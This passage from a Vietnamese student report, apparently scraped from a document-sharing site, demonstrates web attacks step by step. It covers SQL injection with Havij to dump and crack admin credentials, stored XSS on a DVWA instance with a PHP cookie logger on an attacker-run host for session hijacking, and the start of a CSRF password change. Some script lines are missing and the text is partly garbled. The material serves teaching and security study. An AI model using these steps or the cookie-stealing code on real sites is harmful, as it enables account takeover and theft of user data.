CHƯƠNG 3: DEMO MỘT SỐ KỸ THUẬT TẤN CÔNG ỨNG DỤNG WEB
Tải bản đầy đủ - 0trang
Bước 3: Mở Havij tiến hành dò lỗi SQL của trang web.
Ta copy đường link trang web bị lỗi vào mục Target của Havij và nhấn Analyze để
chương trình tiến hành phân tích.
Kết quả sau khi phân tích:
Chương trình đã tìm thấy database của trang web.
Bước 4: Chọn mục Tables, chọn database vừa tìm thấy sau đó nhấn Get Tables
Bước 5: Chọn tt_admin trong bảng sau đó nhấn Get Columns
Bước 6: Chọn username và password sau đó nhấn Get Data
Kết quả ta được thông tin về username và password của trang web. Password được mã
hóa ở dạng MD5
Ta có thể hash ngược mã MD5 để tìm ra password dạng kí tự bằng cách chọn mục MD5
trong chương trình, sau đó dán mã MD5 ở mục password vừa tìm được vào ô MD5 hash.
Nhấn Start để tiến hành hash.
Kết quả sau khi hash password của username hoanggia
3.2 KỸ THUẬT TẤN CÔNG XSS (CROSS-SITE SCRIPTING)
Bước 1: Chuẩn bị một trang web bị lỗi XSS. Trong bài này sử dụng mã web mã nguồn
mở DVWA.
http://victim.16mb.com/login.php
Tài khoản đăng nhập:
Username: Pablo
Password: letmein
Giao diện trang web:
Giao diện sau khi đăng nhập:
Bước 2: Ta truy cập vào mục XSS (Stored), nhập thử đoạn mã sau để kiểm tra:
Trường ĐH CNTT

Kết quả sau khi nhập đoạn mã trên:
Ta thấy các đoạn mã đã được thực thi và chúng được lưu trữ trong database của trang
web. Riêng đoạn mã khơng hiển thị ra ngồi chứng tỏ web
có khả năng bị lỗi XSS Stored, cho phép lưu trữ các đoạn mã thuộc dạng script.
Dựa vào đây thay vì chèn các đoạn mã vơ hại thì các hacker có thể chèn các mã độc
chạy bằng script để lấy thông tin người dùng, bất cứ người dùng nào khi truy cập vào trang
web này thì mã độc sẽ được thực thi.
Bước 3: Ta sẽ tạo một trang web để ăn cắp cookie người dùng.
Web có địa chỉ: http://attack.16mb.com/
Trên trang web này ta tạo 1 file php (cc.php) để lấy cookie người dùng và 1 file log
(log.txt) để lưu cookie.
Nội dung của file cc.php:
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$log=fopen("$ipLog", "a+");
fputs($log, "COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
Bước 4: Ta quay lại mục XSS Stored của DVWA chèn đoạn script:
Kết quả sau khi chèn:
Đoạn script được lưu trên database
Sau đó chỉ việc chờ user khác đăng nhập vào là ta sẽ lấy được cookie.
Bước 5: Thử đăng nhập 1 nick khác vào trang web để kiểm tra.
Username: admin
Password: password
Kết quả sau khi đăng nhập vào và truy cập mục XSS Stored
Ta thấy cookie người dùng đã bị đánh cắp. Kiểm tra lại file log
Cookie thu được:
COOKIE:
cookie=PHPSESSID=55114c5bcbfd6e8153bc3d860eddb243;%20security=low
Bây giờ ta có thể dựa vào cookie đó để đăng nhập vào user admin mà khơng cần biết
password.
Bước 6: Mở trình duyệt firefox, cài tiện ích Cookies Manager +. Sau đó truy cập vào
trang login http://victim.16mb.com/login.php và bật Cookies Manager +
Tick vào mục victim.16mb.com PHPSESSID chọn Edit
Chép đoạn mã cookie vừa đánh cắp được vào mục Content sau đó chọn Save để lưu. Giờ
ta quay lại trang đăng nhập reload lại trang web là có thể truy cập vào bằng user admin.
3.3 3.3 THAO TÁC TRÊN CÁC THAM SỐ TRUYỀN
Bước 1: Chuẩn bị một trang web bị lỗi CSRF. Trong bài này sử dụng mã web mã nguồn
mở DVWA.
http://victim.16mb.com/login.php
Tài khoản đăng nhập:
Username: Pablo
Password: letmein
Bước 2:
Sau khi đăng nhập, chọn CSRF
Bước 3:
Thay đổi mật khẩu admin
“letmein” thành “abc123”